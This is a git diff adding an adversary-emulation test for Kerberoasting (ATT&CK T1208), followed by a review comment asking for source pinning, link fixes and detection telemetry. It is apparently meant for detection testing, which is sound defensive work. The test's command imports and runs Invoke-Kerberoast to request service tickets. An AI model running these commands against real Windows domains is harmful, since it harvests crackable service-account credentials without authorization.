diff --git a/atomics/T1208/T1208.yaml b/atomics/T1208/T1208.yaml
new file mode 100644
index 00000000..0ab00dec
--- /dev/null
+++ b/atomics/T1208/T1208.yaml
@@ -0,0 +1,22 @@
+---
+attack_technique: T1208
+display_name: Kerberoasting
+
+atomic_tests:
+- name: Request for service tickets
+ description: |
+ This test uses the Powershell Empire Module: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+
+ The following are further sources and credits for this attack:
+ [Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)
+ [Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
+
+ supported_platforms:
+ - windows
+
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ Import-Module .\Invoke-Kerberoast.ps1
+ Invoke-Kerberoast | fl
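Review bot: The `command` block imports `.\Invoke-Kerberoast.ps1` from the current directory, but the test never says how that file gets there or which revision is expected, and the only source given is a link to Empire's mutable `master` branch. Pin the description URL to a fixed commit (`.../Empire/blob/<commit-sha>/data/module_source/credentials/Invoke-Kerberoast.ps1`) and, if the schema's `input_arguments` is usable for this test, expose the path so the import line becomes `Import-Module #{script_path}`. The two credit links are written `[text] (url)` with a space before the parenthesis, which will not render as Markdown links; drop the space. A sentence naming the expected telemetry (Kerberos service-ticket requests, Security event 4769 on the domain controller) would help whoever runs the test confirm that detection fired.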